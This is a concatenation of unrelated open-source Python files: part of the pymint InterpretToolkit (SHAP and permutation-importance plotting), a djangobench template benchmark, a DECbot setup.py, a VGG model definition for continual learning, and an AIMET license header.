background_dataset=None,
performance_based=False,
n_samples=100 ):
"""
Computes the individual feature contributions to a predicted outcome for
a series of examples either based on tree interpreter (only Tree-based methods)
or Shapley Additive Explanations.
Parameters
-----------
method : ``'shap'`` or ``'tree_interpreter'``
Can use SHAP or treeinterpreter to compute the feature contributions.
SHAP is estimator-agnostic while treeinterpreter can only be used on
select decision-tree based estimators in scikit-learn. SHAP will attempt
to first use the Tree-based explainer and if that fails, then the
Kernel-based explainer.
background_dataset : array of shape (n_samples, n_features)
A representative (often a K-means or random sample) subset of the
data used to train the ML estimator. Used for the background dataset
to compute the expected values for the SHAP calculations.
Only required for non-tree based estimators.
performance_based : boolean (default=False)
If True, will average feature contributions over the best and worst
performing of the given X. The number of examples to average over
is given by n_samples
n_samples : interger (default=100)
Number of samples to compute average over if performance_based = True
Returns
--------
results_df : nested pandas.DataFrame
For each example, contributions from each feature plus the bias
The dataframe is nested by the estimator names and additional keys
if performance_based=True.
Examples
---------
>>> import pymint
>>> import shap
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> # Only give the X you want contributions for.
>>> # In this case, we are using a single example.
>>> single_example = X.iloc[[0]]
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=single_example,
... )
>>> # Create a background dataset; randomly sample 100 X
>>> background_dataset = shap.sample(X, 100)
>>> contrib_ds = explainer.local_contributions(method='shap',
... background_dataset=background_dataset)
>>> # For the performance-based contributions,
>>> # provide the full set of X and y values.
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> contrib_ds = explainer.local_contributions(method='shap',
... background_dataset=background_dataset,
... performance_based=True, n_samples=100)
"""
results_df = self.local_obj._get_local_prediction(method=method,
background_dataset=background_dataset,
performance_based=performance_based,
n_samples=n_samples,)
# Add metadata
self.attrs_dict['method'] = method
self.attrs_dict['n_samples'] = n_samples
self.attrs_dict['performance_based'] = str(performance_based)
self.attrs_dict['feature_names'] = self.feature_names
results_df = self._append_attributes(results_df)
return results_df
def plot_contributions(self,
contrib=None,
features=None,
estimator_names=None,
display_feature_names={},
**kwargs):
"""
Plots the feature contributions.
Parameters
------------
contrib : Nested pandas.DataFrame
Results of :func:`~InterpretToolkit.local_contributions`
features : string or list of strings (default=None)
Features to plot. If None, all features are eligible to be plotted.
However, the default number of features to plot is 10. Can be set
by n_vars (see keyword arguments).
estimator_names : string, list of strings (default is None)
If using multiple estimators, you can pass a single (or subset of) estimator name(s)
to compute the IAS for.
display_feature_names : dict
For plotting purposes. Dictionary that maps the feature names
in the pandas.DataFrame to display-friendly versions.
E.g., display_feature_names = { 'dwpt2m' : 'T$_{d}$', }
The plotting code can handle latex-style formatting.
Keyword arguments include arguments typically used for matplotlib
Returns
---------
fig: matplotlib figure instance
Examples
---------
>>> import pymint
>>> import shap
>>> estimator_objs, estimator_names = pymint.load_models() # pre-fit estimators within pymint
>>> X, y = pymint.load_data() # training data
>>> # Only give the X you want contributions for.
>>> # In this case, we are using a single example.
>>> single_example = X.iloc[[0]]
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=single_example,
... )
>>> # Create a background dataset; randomly sample 100 X
>>> background_dataset = shap.sample(X, 100)
>>> contrib_ds = explainer.local_contributions(method='shap',
... background_dataset=background_dataset)
>>> explainer.plot_contributions(contrib_ds)
.. image :: ../../images/feature_contribution_single.png
"""
if estimator_names is None:
estimator_names = contrib.attrs['estimators used']
elif is_str(estimator_names):
estimator_names=[estimator_names]
estimator_output = contrib.attrs['estimator_output']
if features is None:
features = contrib.attrs['feature_names']
# initialize a plotting object
only_one_panel = (contrib.index[0][0] == 'non_performance' and len(estimator_names)==1)
base_font_size = kwargs.get('base_font_size', 16 if only_one_panel else 11)
plot_obj = PlotFeatureContributions(BASE_FONT_SIZE=base_font_size)
kwargs['estimator_output'] = self.estimator_output
return plot_obj.plot_contributions(data=contrib,
estimator_names = estimator_names,
features=features,
display_feature_names=display_feature_names,
**kwargs)
def shap(self, background_dataset=None):
"""
Compute the SHapley Additive Explanations (SHAP) values [13]_ [14]_ [15]_. The calculations starts
with the Tree-based explainer and then defaults to the Kernel-based explainer for
non-tree based estimators. If using a non-tree based estimators, then you must provide a
background dataset
Parameters
------------------
background_dataset : array of shape (n_samples, n_features)
A representative (often a K-means or random sample) subset of the
data used to train the ML estimator. Used for the background dataset
to compute the expected values for the SHAP calculations.
Only required for non-tree based methods.
Returns
-------------------
results : dict
Dictionary where the keys represent estimator names, and the
values represent a tuple of SHAP values and the bias.
shap_values is of type numpy.array (n_samples, n_features)
bias is of type numpy.array (1, n_features)
References
------------
.. [13] https://christophm.github.io/interpretable-ml-book/shap.html
.. [14] Lundberg, S. M., G. G. Erion, and S.-I. Lee, 2018: Consistent Individualized
Feature Attribution for Tree Ensembles. Arxiv,.
.. [15] Lundberg, S. M., and Coauthors, 2020: From local explanations to global understanding
with explainable AI for trees. Nat Mach Intell, 2, 56–67, https://doi.org/10.1038/s42256-019-0138-9.
Examples
---------
>>> import pymint
>>> import shap
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> # Create a background dataset; randomly sample 100 X
>>> background_dataset = shap.sample(X, 100)
>>> shap_results = explainer.shap(background_dataset)
"""
self.local_obj.background_dataset = background_dataset
results = {}
for estimator_name, estimator in self.estimators.items():
shap_values, bias = self.local_obj._get_shap_values(estimator=estimator,
X=self.X,)
results[estimator_name] = (shap_values, bias)
return results
def plot_shap(self,
plot_type='summary',
shap_values=None,
features=None,
display_feature_names={},
display_units={},
**kwargs):
"""
Plot the SHapley Additive Explanations (SHAP) [13]_ [14]_ [15]_ summary plot or dependence
plots for various features.
Parameters
-----------
plot_type : ``'summary'`` or ``'dependence'``
if 'summary', plots a feature importance-style plot
if 'dependence', plots a partial depedence style plot
shap_values : array of shape (n_samples, n_features)
SHAP values
features : string or list of strings (default=None)
features to plots if plot_type is 'dependence'.
display_feature_names : dict
For plotting purposes. Dictionary that maps the feature names
in the pandas.DataFrame to display-friendly versions.
E.g., ``display_feature_names = { 'dwpt2m' : '$T_{d}$', }``
The plotting code can handle latex-style formatting.
display_units : dict
For plotting purposes. Dictionary that maps the feature names
to their units.
E.g., ``display_units = { 'dwpt2m' : '$^\circ$C', }``
to_probability : boolean
if True, values are multiplied by 100.
Returns
-----------------------
fig: matplotlib figure instance
Examples
---------
>>> import pymint
>>> import shap
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> # Create a background dataset; randomly sample 100 X
>>> background_dataset = shap.sample(X, 100)
>>> shap_results = explainer.shap(background_dataset)
>>> print(estimator_names)
... ['Random Forest', ]
>>> shap_values, bias = shap_results[estimator_names[0]]
>>> # Plot the SHAP-summary style plot
>>> explainer.plot_shap(plot_type='summary',shap_values=shap_values,)
>>> # Plot the SHAP-dependence style plot
>>> important_vars = ['sfc_temp', 'temp2m', 'sfcT_hrs_bl_frez', 'tmp2m_hrs_bl_frez','uplwav_flux']
>>> explainer.plot_shap(plot_type='dependence',
... shap_values=shap_values, features=important_vars)
.. image :: ../../images/shap_dependence.png
"""
to_probability = True if self.estimator_output == 'probability' else False
if to_probability:
shap_values_copy = np.copy(shap_values)
shap_values_copy *= 100.
else:
shap_values_copy = shap_values
# initialize a plotting object
if plot_type == 'summary':
fontsize=12
else:
fontsize=12 if len(features) <= 6 else 16
base_font_size = kwargs.get('base_font_size', fontsize)
plot_obj = PlotFeatureContributions(BASE_FONT_SIZE=base_font_size)
plot_obj.feature_names = self.feature_names
plot_obj.plot_shap(shap_values=shap_values_copy,
X=self.X,
features=features,
plot_type=plot_type,
display_feature_names=display_feature_names,
display_units=display_units,
**kwargs
)
def plot_importance(self,
data,
panels,
plot_correlated_features=False,
**kwargs):
"""
Method for plotting the permutation importance and other ranking-based results.
Parameters
-------------
panels: List of 2-tuple of (estimator name, method) to determine the sub-panel
matrixing for the plotting. E.g., If you wanted to compare multi-pass to
single-pass permutation importance for a random forest:
``panels = [('Random Forest', 'multipass'), ('Random Forest', 'singlepass')``
The available ranking methods in PyMint include 'multipass', 'singlepass',
'perm_based', 'ale_variance', or 'ale_variance_interactions'.
data : list of xarray.Datasets
Results from
- :func:`~InterpretToolkit.permutation_importance`
- :func:`~InterpretToolkit.ale_variance`
- :func:`~InterpretToolkit.friedman_h_stat`
- :func:`~InterpretToolkit.perm_based_interaction`
For each element in panels, there needs to be a corresponding element in data.
columns : list of strings
What will be the columns of the plot? These can be x-axis label (default is
the different estimator names)
rows : list of strings
Y-axis label or multiple labels for each row in a multi-panel plot. (default is None).
plot_correlated_features : boolean
If True, pairs of features with a linear correlation coefficient > 0.8
are annotate/paired by bars or color-coding. This is useful for identifying
spurious rankings due to the correlations.
kwargs : keyword arguments
num_vars_to_plot : integer
Number of features to plot from permutation importance calculation.
Returns
--------
fig: matplotlib figure instance
Examples
-------
>>> import pymint
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> perm_imp_results = explainer.permutation_importance(
... n_vars=10,
... evaluation_fn = 'norm_aupdc',
... direction = 'backward',
... subsample=0.5,
... n_bootstrap=20,
... )
>>> explainer.plot_importance(data=perm_imp_results, method='multipass')
>>> #If we want to annonate pairs of highly correlated feature pairs
>>> explainer.plot_importance(data=perm_imp_results, method='multipass',
... plot_correlated_features=True)
.. image :: ../../images/multi_pass_perm_imp.png
"""
if is_list(data):
assert len(data) == len(panels), 'Panels and Data must have the same number of elements'
else:
data = [data]
if len(data) != len(panels):
# Assuming that data contains multiple models.
given_estimator_names = [m[1] for m in panels]
available_estimators = [f.split('rankings__')[1] for f in list(data[0].data_vars) if 'rank' in f]
missing = np.array([True if f not in available_estimators else False for f in given_estimator_names])
missing_estimators = list(np.array(given_estimator_names)[missing])
if any(missing):
txt = ''
for i in missing_estimators:
txt += (i + ', ')
raise ValueError (f"""Results for {txt} are not in the given dataset.
Check for possible spelling errors""")
data *= len(panels)
for r, (method, estimator_name) in zip(data, panels):
available_methods = [d.split('__')[0] for d in list(r.data_vars) if f'rankings__{estimator_name}' in d]
if f"{method}_rankings"not in available_methods:
raise ValueError(f"""{method} does not match the available methods for this item({available_methods}).
Ensure that the elements of data match up with those panels!
Also check for any possible spelling error.
""")
estimator_output = kwargs.get('estimator_output', self.estimator_output)
kwargs.pop('estimator_output', None)
# initialize a plotting object
base_font_size = kwargs.get('base_font_size', 12)
plot_obj = PlotImportance(BASE_FONT_SIZE=base_font_size)
if plot_correlated_features:
kwargs['X'] = self.X
return plot_obj.plot_variable_importance(data,
panels=panels,
plot_correlated_features=plot_correlated_features,
estimator_output=estimator_output,
**kwargs)
def plot_box_and_whisker(self, important_vars, example,
display_feature_names={}, display_units={}, **kwargs):
"""
Plot the training dataset distribution for a given set of important variables
as a box-and-whisker plot. The user provides a single example, which is highlighted
over those examples. Useful for real-time explainability.
Parameters:
----------------
important_vars : str or list of strings
List of features to plot
example : Pandas Series, shape = (important_vars,)
Single row dataframe to be overlaid, must have columns equal to
the given important_vars
"""
if not is_list(important_vars):
important_vars = [important_vars]
axis = 'columns' if isinstance(example, pd.DataFrame) else 'index'
if set(getattr(example, axis)) != set(important_vars):
raise ValueError('The example dataframe/series must have important_vars as columns!')
f, axes = box_and_whisker(self.X,
top_preds=important_vars,
example=example,
display_feature_names=display_feature_names,
display_units=display_units,
**kwargs)
return f, axes
def plot_scatter(self, features, kde=True,
subsample=1.0, display_feature_names={}, display_units={}, **kwargs):
"""
2-D Scatter plot of ML model predictions. If kde=True, it will plot KDE contours
overlays to show highest concentrations. If the model type is classification, then
the code will plot KDE contours per class.
"""
# TODO: Handle plotting multiple models!
# TODO: Determining if it is raw or probability (multiple classes too!)
# if there is more than a couple classes, then only plot one kde contours
# Are features in X?
bad_features = [f for f in features if f not in self.feature_names]
if len(bad_features) > 0:
raise ValueError(f'{bad_features} is not a valid feature. Check for possible spelling errors!')
# initialize a plotting object
base_font_size = kwargs.get('base_font_size', 12)
plot_obj = PlotScatter(base_font_size)
f, axes = plot_obj.plot_scatter(self.estimators,
X=self.X,
y=self.y,
features=features,
display_feature_names=display_feature_names,
display_units = display_units,
subsample=subsample,
peak_val=None, kde=kde, **kwargs)
return f, axes
def get_important_vars(self, perm_imp_data, multipass=True, n_vars=10, combine=False):
"""
Retrieve the most important variables from permutation importance.
Can combine rankings from different estimators and only keep those variables that
occur in more than one estimator.
Parameters
------------
perm_imp_data : xarray.Dataset
Permutation importance result dataset
multipass : boolean (defaults to True)
if True, return the multipass rankings else returns the singlepass rankings
n_vars : integer (default=10)
Number of variables to retrieve if multipass=True.
combine : boolean (default=False)
If combine=True, n_vars can be set such that you only include a certain amount of
top features from each estimator. E.g., n_vars=5 and combine=True means to combine
the top 5 features from each estimator into a single list.
Examples
-------
if combine=True
results : list
List of top features from a different estimators.
if combine=False
results : dict
keys are the estimator names and items are the
top features.
Examples
---------
>>> import pymint
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> perm_imp_data = explainer.permutation_importance(
... n_vars=10,
... evaluation_fn = 'norm_aupdc',
... direction = 'backward',
... subsample=0.5,
... n_bootstrap=20,
... )
>>> important_vars = explainer.get_important_vars(perm_imp_data,
... multipass=True, n_vars=5, combine=False)
...
>>> # set combine=True
>>> important_vars = explainer.get_important_vars(perm_imp_data,
... multipass=True, n_vars=5, combine=True)
"""
results = retrieve_important_vars(perm_imp_data,
estimator_names=self.estimator_names,
multipass=multipass)
if not combine:
return results
else:
return combine_top_features(results, n_vars=n_vars)
def load(self, fnames, dtype='dataset'):
"""
Load results of a computation (permutation importance, calc_ale, calc_pd, etc)
Parameters
----------
fnames : string or list of strings
File names of dataframes or datasets to load.
dtype : 'dataset' or 'dataframe'
Indicate whether you are loading a set of xarray.Datasets
or pandas.DataFrames
Returns
--------
results : xarray.DataSet or pandas.DataFrame
data for plotting purposes
Examples
---------
>>> import pymint
>>> explainer = pymint.InterpretToolkit()
>>> fname = 'path/to/your/perm_imp_results'
>>> perm_imp_data = explainer.load(fnames=fname, dtype='dataset')
"""
if dtype == 'dataset':
results = load_netcdf(fnames=fnames)
elif dtype == 'dataframe':
results = load_dataframe(fnames=fnames)
else:
raise ValueError('dtype must be "dataset" or "dataframe"!')
for s in [self, self.global_obj, self.local_obj]:
try:
setattr(s, 'estimator_output', results.attrs['estimator_output'])
estimator_names = [results.attrs['estimators used']]
except:
setattr(s, 'estimator_output', results.attrs['model_output'])
estimator_names = [results.attrs['models used']]
if not is_list(estimator_names):
estimator_names = [estimator_names]
if (any(is_list(i) for i in estimator_names)):
estimator_names = estimator_names[0]
setattr(s, 'estimator_names', estimator_names)
setattr(s, 'estimators used', estimator_names)
return results
def save(self, fname, data):
"""
Save results of a computation (permutation importance, calc_ale, calc_pd, etc)
Parameters
----------
fname : string
filename to store the results in (including path)
data : InterpretToolkit results
the results of a InterpretToolkit calculation. Can be a dataframe or dataset.
Examples
-------
>>> import pymint
>>> estimator_objs, estimator_names = pymint.load_models() # pre-fit estimators within pymint
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> perm_imp_results = explainer.calc_permutation_importance(
... n_vars=10,
... evaluation_fn = 'norm_aupdc',
... direction = 'backward',
... subsample=0.5,
... n_bootstrap=20,
... )
>>> fname = 'path/to/save/the/file'
>>> explainer.save(fname, perm_imp_results)
"""
if is_dataset(data):
save_netcdf(fname=fname,ds=data)
elif is_dataframe(data):
save_dataframe(fname=fname, dframe=data)
else:
raise TypeError(f'data is not a pandas.DataFrame or xarray.Dataset. The type is {type(data)}.')
| 43.569576 | 128 | 0.544364 |
ccb892af2b1e41f05f5e2b3b091e44e1919d2350 | 1,681 | py | Python | djangobench/benchmarks/template_render/benchmark.py | Bouke/djangobench | 94fc28d99f95c65d26d0fad8af44e46c49282220 | [
"BSD-3-Clause"
] | 3 | 2016-11-27T22:25:34.000Z | 2018-12-12T20:06:40.000Z | djangobench/benchmarks/template_render/benchmark.py | Bouke/djangobench | 94fc28d99f95c65d26d0fad8af44e46c49282220 | [
"BSD-3-Clause"
] | null | null | null | djangobench/benchmarks/template_render/benchmark.py | Bouke/djangobench | 94fc28d99f95c65d26d0fad8af44e46c49282220 | [
"BSD-3-Clause"
] | null | null | null | from django import VERSION
from django.shortcuts import render_to_response
from djangobench.utils import run_benchmark
#set up some vars
objects1 = [object(), object(), object(), object(), object()]
objects2 = [object(), object(), object(), object(), object()]
object1 = object()
object2 = object()
object3 = None
num1 = 1
num2 = 2
boolean1 = True
SCRIPT_CONTENT_URL = '/some/prefix'
WEBSITE_DOMAIN = 'http://www.somedomain.com'
SHOW_ALT_HEADER = 'True'
def benchmark_django_lte_13():
context = {
'objects1': objects1,
'objects2': objects2,
'object1': object1,
'object2': object2,
'object3': object3,
'num1' : num1,
'num2' : num2,
'boolean1': boolean1,
'SCRIPT_CONTENT_URL': SCRIPT_CONTENT_URL,
'WEBSITE_DOMAIN': WEBSITE_DOMAIN,
'SHOW_ALT_HEADER': SHOW_ALT_HEADER
}
render_to_response('permalink_django_lte_13.html', context)
def benchmark_django_gt_13():
context = {
'objects1': objects1,
'objects2': objects2,
'object1': object1,
'object2': object2,
'object3': object3,
'num1' : num1,
'num2' : num2,
'boolean1': boolean1,
'SCRIPT_CONTENT_URL': SCRIPT_CONTENT_URL,
'WEBSITE_DOMAIN': WEBSITE_DOMAIN,
'SHOW_ALT_HEADER': SHOW_ALT_HEADER
}
render_to_response('permalink.html', context)
run_benchmark(
benchmark_django_gt_13 if VERSION > (1, 3) else benchmark_django_lte_13,
syncdb = False,
meta = {
'description': ('Render a somewhat complex, fairly typical template '
'(including inheritance, reverse URL resolution, etc.).'),
}
)
| 28.982759 | 82 | 0.638905 |
aa7c54425adb83fb25e6262140bb2c969e86b364 | 791 | py | Python | setup.py | uebergucken/DECbot | fa259d47f901ca9187bff74f08e212739af7774f | [
"MIT"
] | 4 | 2019-10-22T13:34:54.000Z | 2021-06-25T11:43:33.000Z | setup.py | uebergucken/DECbot | fa259d47f901ca9187bff74f08e212739af7774f | [
"MIT"
] | 3 | 2020-11-24T03:10:47.000Z | 2021-07-03T08:54:00.000Z | setup.py | uebergucken/DECbot | fa259d47f901ca9187bff74f08e212739af7774f | [
"MIT"
] | 2 | 2021-06-25T19:42:50.000Z | 2021-06-30T08:09:30.000Z | from setuptools import setup, find_packages
setup(
name = "decbot",
version = "1.0.0",
author = 'Wyatt Lindquist',
author_email = 'git.wquist@gmail.com',
description = "a Discord bot that uses DECtalk text-to-speech",
long_description = open('./README.md').read(),
long_description_content_type = 'text/markdown',
url = 'https://github.com/wquist/DECbot',
license = 'MIT',
classifiers = [
"Programming Language :: Python :: 3.7",
"License :: OSI Approved :: MIT License",
"Operating System :: Unix"
],
packages = find_packages(),
install_requires = ['discord.py', 'pydub', 'pynacl', 'pyyaml'],
entry_points = { 'console_scripts': ['decbot = decbot.__main__:main'] }
)
| 32.958333 | 76 | 0.596713 |
07fa5d844ffe981e17e8b1a976404874a4371baf | 7,858 | py | Python | continual/cnn/vgg.py | arthurdouillard/dytox | 1eebbd8cf5241ede593a5ba51a8c42284f43d1c0 | [
"Apache-2.0"
] | 31 | 2021-11-25T08:44:55.000Z | 2022-03-31T15:20:48.000Z | continual/cnn/vgg.py | arthurdouillard/dytox | 1eebbd8cf5241ede593a5ba51a8c42284f43d1c0 | [
"Apache-2.0"
] | 2 | 2022-03-25T13:06:21.000Z | 2022-03-31T08:58:34.000Z | continual/cnn/vgg.py | arthurdouillard/dytox | 1eebbd8cf5241ede593a5ba51a8c42284f43d1c0 | [
"Apache-2.0"
] | 4 | 2021-12-09T11:28:13.000Z | 2022-03-20T21:18:44.000Z | import torch
import torch.nn as nn
#from .utils import load_state_dict_from_url
from typing import Union, List, Dict, Any, cast
from continual.cnn import AbstractCNN
__all__ = [
'VGG', 'vgg11', 'vgg11_bn', 'vgg13', 'vgg13_bn', 'vgg16', 'vgg16_bn',
'vgg19_bn', 'vgg19',
]
model_urls = {
'vgg11': 'https://download.pytorch.org/models/vgg11-8a719046.pth',
'vgg13': 'https://download.pytorch.org/models/vgg13-19584684.pth',
'vgg16': 'https://download.pytorch.org/models/vgg16-397923af.pth',
'vgg19': 'https://download.pytorch.org/models/vgg19-dcbb9e9d.pth',
'vgg11_bn': 'https://download.pytorch.org/models/vgg11_bn-6002323d.pth',
'vgg13_bn': 'https://download.pytorch.org/models/vgg13_bn-abd245e5.pth',
'vgg16_bn': 'https://download.pytorch.org/models/vgg16_bn-6c64b313.pth',
'vgg19_bn': 'https://download.pytorch.org/models/vgg19_bn-c79401a0.pth',
}
class VGG(AbstractCNN):
def __init__(
self,
features: nn.Module,
num_classes: int = 1000,
init_weights: bool = True
) -> None:
super(VGG, self).__init__()
self.features = features
self.avgpool = nn.AdaptiveAvgPool2d((7, 7))
self.classifier = nn.Sequential(
nn.Linear(512 * 7 * 7, 4096),
nn.ReLU(True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(True),
nn.Dropout(),
)
self.head = None
self.embed_dim = 4096
if init_weights:
self._initialize_weights()
def forward(self, x: torch.Tensor) -> torch.Tensor:
x = self.features(x)
x = self.avgpool(x)
x = torch.flatten(x, 1)
x = self.classifier(x)
return self.head(x)
def _initialize_weights(self) -> None:
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
def make_layers(cfg: List[Union[str, int]], batch_norm: bool = False) -> nn.Sequential:
layers: List[nn.Module] = []
in_channels = 3
for v in cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
v = cast(int, v)
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
return nn.Sequential(*layers)
cfgs: Dict[str, List[Union[str, int]]] = {
'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
}
def _vgg(arch: str, cfg: str, batch_norm: bool, pretrained: bool, progress: bool, **kwargs: Any) -> VGG:
if pretrained:
kwargs['init_weights'] = False
model = VGG(make_layers(cfgs[cfg], batch_norm=batch_norm), **kwargs)
if pretrained:
state_dict = load_state_dict_from_url(model_urls[arch],
progress=progress)
model.load_state_dict(state_dict)
return model
def vgg11(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> VGG:
r"""VGG 11-layer model (configuration "A") from
`"Very Deep Convolutional Networks For Large-Scale Image Recognition" <https://arxiv.org/pdf/1409.1556.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _vgg('vgg11', 'A', False, pretrained, progress, **kwargs)
def vgg11_bn(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> VGG:
r"""VGG 11-layer model (configuration "A") with batch normalization
`"Very Deep Convolutional Networks For Large-Scale Image Recognition" <https://arxiv.org/pdf/1409.1556.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _vgg('vgg11_bn', 'A', True, pretrained, progress, **kwargs)
def vgg13(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> VGG:
r"""VGG 13-layer model (configuration "B")
`"Very Deep Convolutional Networks For Large-Scale Image Recognition" <https://arxiv.org/pdf/1409.1556.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _vgg('vgg13', 'B', False, pretrained, progress, **kwargs)
def vgg13_bn(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> VGG:
r"""VGG 13-layer model (configuration "B") with batch normalization
`"Very Deep Convolutional Networks For Large-Scale Image Recognition" <https://arxiv.org/pdf/1409.1556.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _vgg('vgg13_bn', 'B', True, pretrained, progress, **kwargs)
def vgg16(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> VGG:
r"""VGG 16-layer model (configuration "D")
`"Very Deep Convolutional Networks For Large-Scale Image Recognition" <https://arxiv.org/pdf/1409.1556.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _vgg('vgg16', 'D', False, pretrained, progress, **kwargs)
def vgg16_bn(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> VGG:
r"""VGG 16-layer model (configuration "D") with batch normalization
`"Very Deep Convolutional Networks For Large-Scale Image Recognition" <https://arxiv.org/pdf/1409.1556.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _vgg('vgg16_bn', 'D', True, pretrained, progress, **kwargs)
def vgg19(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> VGG:
r"""VGG 19-layer model (configuration "E")
`"Very Deep Convolutional Networks For Large-Scale Image Recognition" <https://arxiv.org/pdf/1409.1556.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _vgg('vgg19', 'E', False, pretrained, progress, **kwargs)
def vgg19_bn(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> VGG:
r"""VGG 19-layer model (configuration 'E') with batch normalization
`"Very Deep Convolutional Networks For Large-Scale Image Recognition" <https://arxiv.org/pdf/1409.1556.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _vgg('vgg19_bn', 'E', True, pretrained, progress, **kwargs)
| 40.297436 | 114 | 0.626368 |
fc00a50def2921734dd0d29f0825eb706eba6459 | 16,205 | py | Python | TrainingExtensions/tensorflow/src/python/aimet_tensorflow/keras/quantsim.py | aaronkjones/aimet | 08feb34573281f87c53301935652a02f8d573858 | [
"BSD-3-Clause"
] | null | null | null | TrainingExtensions/tensorflow/src/python/aimet_tensorflow/keras/quantsim.py | aaronkjones/aimet | 08feb34573281f87c53301935652a02f8d573858 | [
"BSD-3-Clause"
] | null | null | null | TrainingExtensions/tensorflow/src/python/aimet_tensorflow/keras/quantsim.py | aaronkjones/aimet | 08feb34573281f87c53301935652a02f8d573858 | [
"BSD-3-Clause"
] | null | null | null | # /usr/bin/env python3.5
# -*- mode: python -*-
# =============================================================================
# @@-COPYRIGHT-START-@@
#
# Copyright (c) 2022, Qualcomm Innovation Center, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# SPDX-License-Identifier: BSD-3-Clause
